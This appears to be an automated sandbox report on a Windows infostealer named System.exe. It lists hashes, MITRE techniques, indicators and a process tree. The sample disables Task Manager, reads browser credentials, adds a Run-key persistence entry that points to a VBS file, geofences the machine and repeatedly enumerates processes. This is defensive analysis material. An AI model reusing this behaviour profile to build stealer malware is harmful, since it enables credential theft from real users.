af277117f93fbe518b20b27504d9607df8389027daa848178dcf24355b33bd82

Resubmissions

15/03/2024, 17:57

240315-wjxylafa5y 8

Analysis

max time kernel
164s
max time network
175s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
15/03/2024, 17:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

System.exe
Size

158.3MB
MD5

2fc619804ddd0e6a29f768292822d6d6
SHA1

d43152e0c3f040a59a07d1b494d80361d904d7c9
SHA256

994eaeba18456e8337729eb62403048c69289af5c0c5a01e129ab088c39765d0
SHA512

c6705b4bc2a2dd233fc564694a87811a4e9e58eccef0000ef2598f90fa62149a29232d64819af4c406557d358bd3c2b2f4d9458245593d7a920301688638daff
SSDEEP

1572864:UatFKZwMtLYWQwZOTACYItd+qy9YN6yxL+a6ZqbZX5OG+hJfROyOe/FkCX3cIwvI:viQ08xye4

Score

8^/10

evasion persistence spyware stealer

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation	System.exe

Loads dropped DLL 2 IoCs

pid	Process
864	System.exe
864	System.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Start_Q9zRra = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\sysWin10Boot_Q9zRra.vbs"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
122	raw.githubusercontent.com
99	raw.githubusercontent.com
103	raw.githubusercontent.com
105	raw.githubusercontent.com
106	raw.githubusercontent.com
107	raw.githubusercontent.com
115	raw.githubusercontent.com
121	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
71	ipinfo.io
72	ipinfo.io

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	System.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	System.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	System.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	System.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	System.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	System.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	System.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
12124	WMIC.exe

Enumerates processes with tasklist 1 TTPs 64 IoCs

Process Discovery

T1057

pid	Process
8620	tasklist.exe
8412	tasklist.exe
9196	tasklist.exe
8904	tasklist.exe
8668	tasklist.exe
8564	tasklist.exe
8492	tasklist.exe
8268	tasklist.exe
8200	tasklist.exe
8636	tasklist.exe
8824	tasklist.exe
8692	tasklist.exe
8396	tasklist.exe
8252	tasklist.exe
9036	tasklist.exe
8800	tasklist.exe
8404	tasklist.exe
9020	tasklist.exe
8888	tasklist.exe
8844	tasklist.exe
8732	tasklist.exe
8708	tasklist.exe
8224	tasklist.exe
8428	tasklist.exe
9012	tasklist.exe
8604	tasklist.exe
8356	tasklist.exe
8284	tasklist.exe
8700	tasklist.exe
8680	tasklist.exe
8628	tasklist.exe
8652	tasklist.exe
8644	tasklist.exe
8500	tasklist.exe
8300	tasklist.exe
8524	tasklist.exe
8956	tasklist.exe
8852	tasklist.exe
9080	tasklist.exe
8964	tasklist.exe
8372	tasklist.exe
8508	tasklist.exe
8420	tasklist.exe
8380	tasklist.exe
8236	tasklist.exe
8580	tasklist.exe
8556	tasklist.exe
8516	tasklist.exe
8572	tasklist.exe
9128	tasklist.exe
8768	tasklist.exe
8716	tasklist.exe
9028	tasklist.exe
8588	tasklist.exe
8364	tasklist.exe
904	tasklist.exe
8324	tasklist.exe
9064	tasklist.exe
8336	tasklist.exe
8996	tasklist.exe
8388	tasklist.exe
8308	tasklist.exe
8244	tasklist.exe
8972	tasklist.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 50 IoCs

pid	Process
864	System.exe
864	System.exe
864	System.exe
864	System.exe
864	System.exe
864	System.exe
12224	powershell.exe
12224	powershell.exe
12224	powershell.exe
6204	powershell.exe
6204	powershell.exe
6204	powershell.exe
10432	powershell.exe
10432	powershell.exe
10624	powershell.exe
10624	powershell.exe
9124	powershell.exe
9124	powershell.exe
10432	powershell.exe
9124	powershell.exe
10624	powershell.exe
10652	powershell.exe
10652	powershell.exe
10652	powershell.exe
8772	powershell.exe
8772	powershell.exe
8772	powershell.exe
7292	powershell.exe
7292	powershell.exe
7784	powershell.exe
7784	powershell.exe
7292	powershell.exe
7784	powershell.exe
5124	powershell.exe
5124	powershell.exe
5124	powershell.exe
7988	powershell.exe
7988	powershell.exe
7988	powershell.exe
9024	powershell.exe
9024	powershell.exe
9024	powershell.exe
5524	powershell.exe
5524	powershell.exe
5524	powershell.exe
8620	powershell.exe
8620	powershell.exe
8620	powershell.exe
9860	System.exe
9860	System.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	864	System.exe
Token: SeCreatePagefilePrivilege	864	System.exe
Token: SeDebugPrivilege	904	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2216	WMIC.exe
Token: SeSecurityPrivilege	2216	WMIC.exe
Token: SeTakeOwnershipPrivilege	2216	WMIC.exe
Token: SeLoadDriverPrivilege	2216	WMIC.exe
Token: SeSystemProfilePrivilege	2216	WMIC.exe
Token: SeSystemtimePrivilege	2216	WMIC.exe
Token: SeProfSingleProcessPrivilege	2216	WMIC.exe
Token: SeIncBasePriorityPrivilege	2216	WMIC.exe
Token: SeCreatePagefilePrivilege	2216	WMIC.exe
Token: SeBackupPrivilege	2216	WMIC.exe
Token: SeRestorePrivilege	2216	WMIC.exe
Token: SeShutdownPrivilege	2216	WMIC.exe
Token: SeDebugPrivilege	2216	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2216	WMIC.exe
Token: SeRemoteShutdownPrivilege	2216	WMIC.exe
Token: SeUndockPrivilege	2216	WMIC.exe
Token: SeManageVolumePrivilege	2216	WMIC.exe
Token: 33	2216	WMIC.exe
Token: 34	2216	WMIC.exe
Token: 35	2216	WMIC.exe
Token: 36	2216	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2216	WMIC.exe
Token: SeSecurityPrivilege	2216	WMIC.exe
Token: SeTakeOwnershipPrivilege	2216	WMIC.exe
Token: SeLoadDriverPrivilege	2216	WMIC.exe
Token: SeSystemProfilePrivilege	2216	WMIC.exe
Token: SeSystemtimePrivilege	2216	WMIC.exe
Token: SeProfSingleProcessPrivilege	2216	WMIC.exe
Token: SeIncBasePriorityPrivilege	2216	WMIC.exe
Token: SeCreatePagefilePrivilege	2216	WMIC.exe
Token: SeBackupPrivilege	2216	WMIC.exe
Token: SeRestorePrivilege	2216	WMIC.exe
Token: SeShutdownPrivilege	2216	WMIC.exe
Token: SeDebugPrivilege	2216	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2216	WMIC.exe
Token: SeRemoteShutdownPrivilege	2216	WMIC.exe
Token: SeUndockPrivilege	2216	WMIC.exe
Token: SeManageVolumePrivilege	2216	WMIC.exe
Token: 33	2216	WMIC.exe
Token: 34	2216	WMIC.exe
Token: 35	2216	WMIC.exe
Token: 36	2216	WMIC.exe
Token: SeShutdownPrivilege	864	System.exe
Token: SeCreatePagefilePrivilege	864	System.exe
Token: SeShutdownPrivilege	864	System.exe
Token: SeCreatePagefilePrivilege	864	System.exe
Token: SeShutdownPrivilege	864	System.exe
Token: SeCreatePagefilePrivilege	864	System.exe
Token: SeDebugPrivilege	6416	tasklist.exe
Token: SeDebugPrivilege	8100	tasklist.exe
Token: SeDebugPrivilege	8224	tasklist.exe
Token: SeDebugPrivilege	8268	tasklist.exe
Token: SeDebugPrivilege	8244	tasklist.exe
Token: SeDebugPrivilege	8236	tasklist.exe
Token: SeDebugPrivilege	6924	tasklist.exe
Token: SeShutdownPrivilege	864	System.exe
Token: SeCreatePagefilePrivilege	864	System.exe
Token: SeDebugPrivilege	8216	tasklist.exe
Token: SeDebugPrivilege	8300	tasklist.exe
Token: SeDebugPrivilege	8200	tasklist.exe
Token: SeDebugPrivilege	8628	tasklist.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 864 wrote to memory of 2240	864	System.exe	95
PID 864 wrote to memory of 2240	864	System.exe	95
PID 2240 wrote to memory of 904	2240	cmd.exe	97
PID 2240 wrote to memory of 904	2240	cmd.exe	97
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 4772	864	System.exe	98
PID 864 wrote to memory of 1424	864	System.exe	99
PID 864 wrote to memory of 1424	864	System.exe	99
PID 864 wrote to memory of 3668	864	System.exe	104
PID 864 wrote to memory of 3668	864	System.exe	104
PID 3668 wrote to memory of 2216	3668	cmd.exe	106
PID 3668 wrote to memory of 2216	3668	cmd.exe	106
PID 864 wrote to memory of 3740	864	System.exe	107
PID 864 wrote to memory of 3740	864	System.exe	107
PID 864 wrote to memory of 2044	864	System.exe	108
PID 864 wrote to memory of 2044	864	System.exe	108
PID 864 wrote to memory of 4984	864	System.exe	109
PID 864 wrote to memory of 4984	864	System.exe	109
PID 864 wrote to memory of 1804	864	System.exe	111
PID 864 wrote to memory of 1804	864	System.exe	111
PID 864 wrote to memory of 3124	864	System.exe	113
PID 864 wrote to memory of 3124	864	System.exe	113
PID 864 wrote to memory of 1612	864	System.exe	114
PID 864 wrote to memory of 1612	864	System.exe	114
PID 864 wrote to memory of 4492	864	System.exe	116
PID 864 wrote to memory of 4492	864	System.exe	116
PID 864 wrote to memory of 4552	864	System.exe	117
PID 864 wrote to memory of 4552	864	System.exe	117
PID 864 wrote to memory of 4484	864	System.exe	118
PID 864 wrote to memory of 4484	864	System.exe	118
PID 864 wrote to memory of 4480	864	System.exe	119
PID 864 wrote to memory of 4480	864	System.exe	119
PID 864 wrote to memory of 3752	864	System.exe	120
PID 864 wrote to memory of 3752	864	System.exe	120
PID 864 wrote to memory of 3056	864	System.exe	121
PID 864 wrote to memory of 3056	864	System.exe	121

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
10516	attrib.exe

C:\Users\Admin\AppData\Local\Temp\System.exe
"C:\Users\Admin\AppData\Local\Temp\System.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2240
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:904
- C:\Users\Admin\AppData\Local\Temp\System.exe
  "C:\Users\Admin\AppData\Local\Temp\System.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\megamindnva" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1736 --field-trial-handle=1740,i,3751571324849698368,13792513845905616171,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  2⤵
  PID:4772
- C:\Users\Admin\AppData\Local\Temp\System.exe
  "C:\Users\Admin\AppData\Local\Temp\System.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\megamindnva" --mojo-platform-channel-handle=2276 --field-trial-handle=1740,i,3751571324849698368,13792513845905616171,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
  2⤵
  PID:1424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3668
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where processid=NaN get ExecutablePath
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3740
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:8200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2044
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4984
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:8244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1804
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:8100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3124
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:8224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1612
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4492
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4552
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4484
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4480
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:8216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3752
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3056
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:8236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4088
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3540
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2488
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:436
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4964
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1920
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:9036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3120
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2996
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3692
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3488
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3044
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1468
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3128
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5008
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1556
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1764
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1328
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4980
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3364
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5132
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5152
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5168
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5176
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5184
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5192
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5208
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:8268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5232
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5244
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5264
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5276
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5296
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5316
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:9004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5336
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5356
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5380
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5396
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5420
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:9064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5440
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5468
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5504
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5528
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:8300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5544
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5568
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5592
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5608
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5616
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5624
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5636
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5660
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:9128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5676
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5692
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5720
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5732
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5752
- - C:\Windows\system32\tasklist.exe
    tasklist
